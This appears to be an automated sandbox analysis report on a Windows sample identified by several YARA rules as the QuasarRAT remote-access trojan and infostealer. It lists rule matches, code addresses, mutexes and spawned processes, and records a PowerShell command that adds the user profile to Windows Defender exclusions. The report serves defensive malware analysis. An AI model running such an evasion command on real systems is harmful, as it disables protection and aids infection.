Source: 29.2.wmplayer.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Quasar infostealer Author: ditekshen
Source: 0.2.KxgGGaiW3E.exe.2b6961b2b38.0.unpack, type: UNPACKEDPE	Matched rule: Detects QuasarRAT malware Author: Florian Roth
Source: 0.2.KxgGGaiW3E.exe.2b6961b2b38.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 0.2.KxgGGaiW3E.exe.2b6961b2b38.0.unpack, type: UNPACKEDPE	Matched rule: Detects Quasar infostealer Author: ditekshen
Source: 19.2.KxgGGaiW3E.exe.2059a712b38.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects QuasarRAT malware Author: Florian Roth
Source: 19.2.KxgGGaiW3E.exe.2059a712b38.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 19.2.KxgGGaiW3E.exe.2059a712b38.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Quasar infostealer Author: ditekshen
Source: 19.2.KxgGGaiW3E.exe.2059a712b38.0.unpack, type: UNPACKEDPE	Matched rule: Detects QuasarRAT malware Author: Florian Roth
Source: 19.2.KxgGGaiW3E.exe.2059a712b38.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 19.2.KxgGGaiW3E.exe.2059a712b38.0.unpack, type: UNPACKEDPE	Matched rule: Detects Quasar infostealer Author: ditekshen
Source: 5.2.ngen.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects QuasarRAT malware Author: Florian Roth
Source: 5.2.ngen.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 5.2.ngen.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Quasar infostealer Author: ditekshen
Source: 0.2.KxgGGaiW3E.exe.2b69585a870.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects QuasarRAT malware Author: Florian Roth
Source: 0.2.KxgGGaiW3E.exe.2b69585a870.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 0.2.KxgGGaiW3E.exe.2b69585a870.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Quasar infostealer Author: ditekshen
Source: 19.2.KxgGGaiW3E.exe.20599dba870.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects QuasarRAT malware Author: Florian Roth
Source: 19.2.KxgGGaiW3E.exe.20599dba870.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 19.2.KxgGGaiW3E.exe.20599dba870.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Quasar infostealer Author: ditekshen
Source: 13.2.KxgGGaiW3E.exe.17bef17a870.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects QuasarRAT malware Author: Florian Roth
Source: 13.2.KxgGGaiW3E.exe.17bef17a870.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 13.2.KxgGGaiW3E.exe.17bef17a870.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Quasar infostealer Author: ditekshen

Uses regedit.exe to modify the Windows registry

Source: C:\Users\user\KxgGGaiW3E.exe

Process created: C:\Windows\regedit.exe "C:\Windows\regedit.exe"

Source: C:\Windows\System32\svchost.exe

File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

Jump to behavior

Source: C:\Users\user\Desktop\KxgGGaiW3E.exe	Code function: 0_2_00007FF7F30FD240	0_2_00007FF7F30FD240
Source: C:\Users\user\Desktop\KxgGGaiW3E.exe	Code function: 0_2_00007FF7F30F17E0	0_2_00007FF7F30F17E0
Source: C:\Users\user\Desktop\KxgGGaiW3E.exe	Code function: 0_2_00007FF7F30F2C20	0_2_00007FF7F30F2C20
Source: C:\Users\user\Desktop\KxgGGaiW3E.exe	Code function: 0_2_00007FF7F30EEA70	0_2_00007FF7F30EEA70
Source: C:\Users\user\Desktop\KxgGGaiW3E.exe	Code function: 0_2_00007FF7F30F0B10	0_2_00007FF7F30F0B10
Source: C:\Users\user\Desktop\KxgGGaiW3E.exe	Code function: 0_2_00007FF7F30DB050	0_2_00007FF7F30DB050
Source: C:\Users\user\Desktop\KxgGGaiW3E.exe	Code function: 0_2_00007FF7F30EB350	0_2_00007FF7F30EB350
Source: C:\Users\user\Desktop\KxgGGaiW3E.exe	Code function: 0_2_00007FF7F30F6390	0_2_00007FF7F30F6390
Source: C:\Users\user\Desktop\KxgGGaiW3E.exe	Code function: 0_2_00007FF7F30E22E0	0_2_00007FF7F30E22E0
Source: C:\Users\user\Desktop\KxgGGaiW3E.exe	Code function: 0_2_00007FF7F30E1142	0_2_00007FF7F30E1142
Source: C:\Users\user\Desktop\KxgGGaiW3E.exe	Code function: 0_2_00007FF7F31EC190	0_2_00007FF7F31EC190
Source: C:\Users\user\Desktop\KxgGGaiW3E.exe	Code function: 0_2_00007FF7F30F5910	0_2_00007FF7F30F5910
Source: C:\Users\user\Desktop\KxgGGaiW3E.exe	Code function: 0_2_00007FF7F30D4CD0	0_2_00007FF7F30D4CD0
Source: C:\Users\user\Desktop\KxgGGaiW3E.exe	Code function: 0_2_00007FF7F30DFBD0	0_2_00007FF7F30DFBD0
Source: C:\Users\user\Desktop\KxgGGaiW3E.exe	Code function: 0_2_00007FF7F30D8AF0	0_2_00007FF7F30D8AF0
Source: C:\Users\user\Desktop\KxgGGaiW3E.exe	Code function: 0_2_00007FF7F30D5980	0_2_00007FF7F30D5980
Source: C:\Users\user\Desktop\KxgGGaiW3E.exe	Code function: 0_2_00007FF7F30E1A00	0_2_00007FF7F30E1A00
Source: C:\Users\user\Desktop\KxgGGaiW3E.exe	Code function: 0_2_00007FF7F30CA020	0_2_00007FF7F30CA020
Source: C:\Users\user\Desktop\KxgGGaiW3E.exe	Code function: 0_2_00007FF7F30F00D0	0_2_00007FF7F30F00D0
Source: C:\Users\user\Desktop\KxgGGaiW3E.exe	Code function: 0_2_00007FF7F30F4D80	0_2_00007FF7F30F4D80
Source: C:\Users\user\KxgGGaiW3E.exe	Code function: 13_2_00007FF70304D240	13_2_00007FF70304D240
Source: C:\Users\user\KxgGGaiW3E.exe	Code function: 13_2_00007FF70303A190	13_2_00007FF70303A190
Source: C:\Users\user\KxgGGaiW3E.exe	Code function: 13_2_00007FF7030417E0	13_2_00007FF7030417E0
Source: C:\Users\user\KxgGGaiW3E.exe	Code function: 13_2_00007FF703042C20	13_2_00007FF703042C20
Source: C:\Users\user\KxgGGaiW3E.exe	Code function: 13_2_00007FF70303EA70	13_2_00007FF70303EA70
Source: C:\Users\user\KxgGGaiW3E.exe	Code function: 13_2_00007FF703040B10	13_2_00007FF703040B10
Source: C:\Users\user\KxgGGaiW3E.exe	Code function: 13_2_00007FF70302B050	13_2_00007FF70302B050
Source: C:\Users\user\KxgGGaiW3E.exe	Code function: 13_2_00007FF703051490	13_2_00007FF703051490
Source: C:\Users\user\KxgGGaiW3E.exe	Code function: 13_2_00007FF70303B350	13_2_00007FF70303B350
Source: C:\Users\user\KxgGGaiW3E.exe	Code function: 13_2_00007FF703035350	13_2_00007FF703035350
Source: C:\Users\user\KxgGGaiW3E.exe	Code function: 13_2_00007FF703048340	13_2_00007FF703048340
Source: C:\Users\user\KxgGGaiW3E.exe	Code function: 13_2_00007FF703046390	13_2_00007FF703046390
Source: C:\Users\user\KxgGGaiW3E.exe	Code function: 13_2_00007FF7030383E0	13_2_00007FF7030383E0
Source: C:\Users\user\KxgGGaiW3E.exe	Code function: 13_2_00007FF703036240	13_2_00007FF703036240
Source: C:\Users\user\KxgGGaiW3E.exe	Code function: 13_2_00007FF703037260	13_2_00007FF703037260
Source: C:\Users\user\KxgGGaiW3E.exe	Code function: 13_2_00007FF7030322E0	13_2_00007FF7030322E0
Source: C:\Users\user\KxgGGaiW3E.exe	Code function: 13_2_00007FF703031142	13_2_00007FF703031142
Source: C:\Users\user\KxgGGaiW3E.exe	Code function: 13_2_00007FF70313C190	13_2_00007FF70313C190
Source: C:\Users\user\KxgGGaiW3E.exe	Code function: 13_2_00007FF7030408B0	13_2_00007FF7030408B0
Source: C:\Users\user\KxgGGaiW3E.exe	Code function: 13_2_00007FF70303A8D0	13_2_00007FF70303A8D0
Source: C:\Users\user\KxgGGaiW3E.exe	Code function: 13_2_00007FF703047912	13_2_00007FF703047912
Source: C:\Users\user\KxgGGaiW3E.exe	Code function: 13_2_00007FF703045910	13_2_00007FF703045910
Source: C:\Users\user\KxgGGaiW3E.exe	Code function: 13_2_00007FF703049901	13_2_00007FF703049901
Source: C:\Users\user\KxgGGaiW3E.exe	Code function: 13_2_00007FF703038630	13_2_00007FF703038630
Source: C:\Users\user\KxgGGaiW3E.exe	Code function: 13_2_00007FF7030395D0	13_2_00007FF7030395D0
Source: C:\Users\user\KxgGGaiW3E.exe	Code function: 13_2_00007FF703024CD0	13_2_00007FF703024CD0
Source: C:\Users\user\KxgGGaiW3E.exe	Code function: 13_2_00007FF70302FBD0	13_2_00007FF70302FBD0
Source: C:\Users\user\KxgGGaiW3E.exe	Code function: 13_2_00007FF70304EC00	13_2_00007FF70304EC00
Source: C:\Users\user\KxgGGaiW3E.exe	Code function: 13_2_00007FF703037A20	13_2_00007FF703037A20
Source: C:\Users\user\KxgGGaiW3E.exe	Code function: 13_2_00007FF70304BA50	13_2_00007FF70304BA50
Source: C:\Users\user\KxgGGaiW3E.exe	Code function: 13_2_00007FF703028AF0	13_2_00007FF703028AF0
Source: C:\Users\user\KxgGGaiW3E.exe	Code function: 13_2_00007FF703038920	13_2_00007FF703038920
Source: C:\Users\user\KxgGGaiW3E.exe	Code function: 13_2_00007FF703025980	13_2_00007FF703025980
Source: C:\Users\user\KxgGGaiW3E.exe	Code function: 13_2_00007FF703031A00	13_2_00007FF703031A00
Source: C:\Users\user\KxgGGaiW3E.exe	Code function: 13_2_00007FF70301A020	13_2_00007FF70301A020
Source: C:\Users\user\KxgGGaiW3E.exe	Code function: 13_2_00007FF7030400D0	13_2_00007FF7030400D0
Source: C:\Users\user\KxgGGaiW3E.exe	Code function: 13_2_00007FF703044D80	13_2_00007FF703044D80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 25_2_05C3F03C	25_2_05C3F03C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 25_2_0DD7A200	25_2_0DD7A200
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 25_2_0DD76D88	25_2_0DD76D88

Source: C:\Users\user\KxgGGaiW3E.exe	Code function: String function: 00007FF70301B360 appears 52 times
Source: C:\Users\user\Desktop\KxgGGaiW3E.exe	Code function: String function: 00007FF7F30CB360 appears 52 times

Source: KxgGGaiW3E.exe	Binary or memory string: OriginalFilename vs KxgGGaiW3E.exe
Source: KxgGGaiW3E.exe, 00000000.00000002.2117583475.000002B695FC1000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameClient.exe. vs KxgGGaiW3E.exe
Source: KxgGGaiW3E.exe, 00000000.00000002.2120112704.00007FF7F33E5000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameoKaxuwAt. vs KxgGGaiW3E.exe
Source: KxgGGaiW3E.exe, 00000000.00000002.2117583475.000002B6955C1000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameClient.exe. vs KxgGGaiW3E.exe
Source: KxgGGaiW3E.exe, 00000000.00000002.2117583475.000002B694BC1000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameoKaxuwAt. vs KxgGGaiW3E.exe
Source: KxgGGaiW3E.exe	Binary or memory string: OriginalFilename vs KxgGGaiW3E.exe
Source: KxgGGaiW3E.exe, 0000000D.00000002.2407170841.0000017BEF8E1000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameClient.exe. vs KxgGGaiW3E.exe
Source: KxgGGaiW3E.exe, 0000000D.00000002.2407170841.0000017BEE4E1000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameoKaxuwAt. vs KxgGGaiW3E.exe
Source: KxgGGaiW3E.exe, 0000000D.00000000.2257610633.00007FF703335000.00000002.00000001.01000000.00000008.sdmp	Binary or memory string: OriginalFilenameoKaxuwAt. vs KxgGGaiW3E.exe
Source: KxgGGaiW3E.exe, 0000000D.00000002.2407170841.0000017BEEEE1000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameClient.exe. vs KxgGGaiW3E.exe
Source: KxgGGaiW3E.exe, 00000013.00000002.2435090839.0000020599B21000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameClient.exe. vs KxgGGaiW3E.exe
Source: KxgGGaiW3E.exe, 00000013.00000002.2435090839.0000020599121000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameoKaxuwAt. vs KxgGGaiW3E.exe
Source: KxgGGaiW3E.exe, 00000013.00000002.2441468509.00007FF703335000.00000002.00000001.01000000.00000008.sdmp	Binary or memory string: OriginalFilenameoKaxuwAt. vs KxgGGaiW3E.exe
Source: KxgGGaiW3E.exe, 00000013.00000002.2435090839.000002059A521000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameClient.exe. vs KxgGGaiW3E.exe

Source: 0.2.KxgGGaiW3E.exe.2b69585a870.1.unpack, type: UNPACKEDPE	Matched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
Source: 0.2.KxgGGaiW3E.exe.2b69585a870.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 0.2.KxgGGaiW3E.exe.2b69585a870.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_QuasarStealer author = ditekshen, description = Detects Quasar infostealer, clamav_sig = MALWARE.Win.Trojan.QuasarStealer
Source: 19.2.KxgGGaiW3E.exe.20599dba870.1.unpack, type: UNPACKEDPE	Matched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
Source: 19.2.KxgGGaiW3E.exe.20599dba870.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 19.2.KxgGGaiW3E.exe.20599dba870.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_QuasarStealer author = ditekshen, description = Detects Quasar infostealer, clamav_sig = MALWARE.Win.Trojan.QuasarStealer
Source: 13.2.KxgGGaiW3E.exe.17bef17a870.0.unpack, type: UNPACKEDPE	Matched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
Source: 13.2.KxgGGaiW3E.exe.17bef17a870.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 13.2.KxgGGaiW3E.exe.17bef17a870.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_QuasarStealer author = ditekshen, description = Detects Quasar infostealer, clamav_sig = MALWARE.Win.Trojan.QuasarStealer
Source: 13.2.KxgGGaiW3E.exe.17befad2b38.1.unpack, type: UNPACKEDPE	Matched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
Source: 13.2.KxgGGaiW3E.exe.17befad2b38.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 13.2.KxgGGaiW3E.exe.17befad2b38.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_QuasarStealer author = ditekshen, description = Detects Quasar infostealer, clamav_sig = MALWARE.Win.Trojan.QuasarStealer
Source: 0.2.KxgGGaiW3E.exe.2b6961b2b38.0.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
Source: 0.2.KxgGGaiW3E.exe.2b6961b2b38.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 0.2.KxgGGaiW3E.exe.2b6961b2b38.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_QuasarStealer author = ditekshen, description = Detects Quasar infostealer, clamav_sig = MALWARE.Win.Trojan.QuasarStealer
Source: 13.2.KxgGGaiW3E.exe.17befad2b38.1.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
Source: 13.2.KxgGGaiW3E.exe.17befad2b38.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 13.2.KxgGGaiW3E.exe.17befad2b38.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_QuasarStealer author = ditekshen, description = Detects Quasar infostealer, clamav_sig = MALWARE.Win.Trojan.QuasarStealer
Source: 18.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
Source: 18.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 18.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_QuasarStealer author = ditekshen, description = Detects Quasar infostealer, clamav_sig = MALWARE.Win.Trojan.QuasarStealer
Source: 29.2.wmplayer.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
Source: 29.2.wmplayer.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 29.2.wmplayer.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_QuasarStealer author = ditekshen, description = Detects Quasar infostealer, clamav_sig = MALWARE.Win.Trojan.QuasarStealer
Source: 0.2.KxgGGaiW3E.exe.2b6961b2b38.0.unpack, type: UNPACKEDPE	Matched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
Source: 0.2.KxgGGaiW3E.exe.2b6961b2b38.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 0.2.KxgGGaiW3E.exe.2b6961b2b38.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_QuasarStealer author = ditekshen, description = Detects Quasar infostealer, clamav_sig = MALWARE.Win.Trojan.QuasarStealer
Source: 19.2.KxgGGaiW3E.exe.2059a712b38.0.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
Source: 19.2.KxgGGaiW3E.exe.2059a712b38.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 19.2.KxgGGaiW3E.exe.2059a712b38.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_QuasarStealer author = ditekshen, description = Detects Quasar infostealer, clamav_sig = MALWARE.Win.Trojan.QuasarStealer
Source: 19.2.KxgGGaiW3E.exe.2059a712b38.0.unpack, type: UNPACKEDPE	Matched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
Source: 19.2.KxgGGaiW3E.exe.2059a712b38.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 19.2.KxgGGaiW3E.exe.2059a712b38.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_QuasarStealer author = ditekshen, description = Detects Quasar infostealer, clamav_sig = MALWARE.Win.Trojan.QuasarStealer
Source: 5.2.ngen.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
Source: 5.2.ngen.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 5.2.ngen.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_QuasarStealer author = ditekshen, description = Detects Quasar infostealer, clamav_sig = MALWARE.Win.Trojan.QuasarStealer
Source: 0.2.KxgGGaiW3E.exe.2b69585a870.1.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
Source: 0.2.KxgGGaiW3E.exe.2b69585a870.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 0.2.KxgGGaiW3E.exe.2b69585a870.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_QuasarStealer author = ditekshen, description = Detects Quasar infostealer, clamav_sig = MALWARE.Win.Trojan.QuasarStealer
Source: 19.2.KxgGGaiW3E.exe.20599dba870.1.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
Source: 19.2.KxgGGaiW3E.exe.20599dba870.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 19.2.KxgGGaiW3E.exe.20599dba870.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_QuasarStealer author = ditekshen, description = Detects Quasar infostealer, clamav_sig = MALWARE.Win.Trojan.QuasarStealer
Source: 13.2.KxgGGaiW3E.exe.17bef17a870.0.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
Source: 13.2.KxgGGaiW3E.exe.17bef17a870.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 13.2.KxgGGaiW3E.exe.17bef17a870.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_QuasarStealer author = ditekshen, description = Detects Quasar infostealer, clamav_sig = MALWARE.Win.Trojan.QuasarStealer

Source: classification engine

Classification label: mal100.troj.evad.winEXE@67/86@17/10

Source: C:\Users\user\Desktop\KxgGGaiW3E.exe	Code function: 0_2_00007FF7F30D4B00 LookupPrivilegeValueW,GetCurrentProcess,OpenProcessToken,AdjustTokenPrivileges,GetLastError,CloseHandle,GetLargePageMinimum,VirtualAlloc,GetCurrentProcess,VirtualAllocExNuma,		0_2_00007FF7F30D4B00
Source: C:\Users\user\KxgGGaiW3E.exe	Code function: 13_2_00007FF703024B00 LookupPrivilegeValueW,GetCurrentProcess,OpenProcessToken,AdjustTokenPrivileges,GetLastError,CloseHandle,GetLargePageMinimum,VirtualAlloc,GetCurrentProcess,VirtualAllocExNuma,		13_2_00007FF703024B00

Source: C:\Users\user\Desktop\KxgGGaiW3E.exe

File created: C:\Users\user\KxgGGaiW3E.exe

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7956:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3752:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7316:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3640:120:WilError_03
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\b0fcdfbd-bdd4-4a5d-8ab1-7217539d4db6
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7488:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2836:120:WilError_03

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_10ut22kp.yp0.ps1

Jump to behavior

Source: KxgGGaiW3E.exe

Static file information: TRID: Win64 Executable Console Net Framework (206006/5) 48.58%

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\KxgGGaiW3E.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\Desktop\KxgGGaiW3E.exe

File read: C:\Users\user\Desktop\KxgGGaiW3E.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\KxgGGaiW3E.exe "C:\Users\user\Desktop\KxgGGaiW3E.exe"
Source: C:\Users\user\Desktop\KxgGGaiW3E.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\KxgGGaiW3E.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath $env:UserProfile
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\KxgGGaiW3E.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=ngen.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
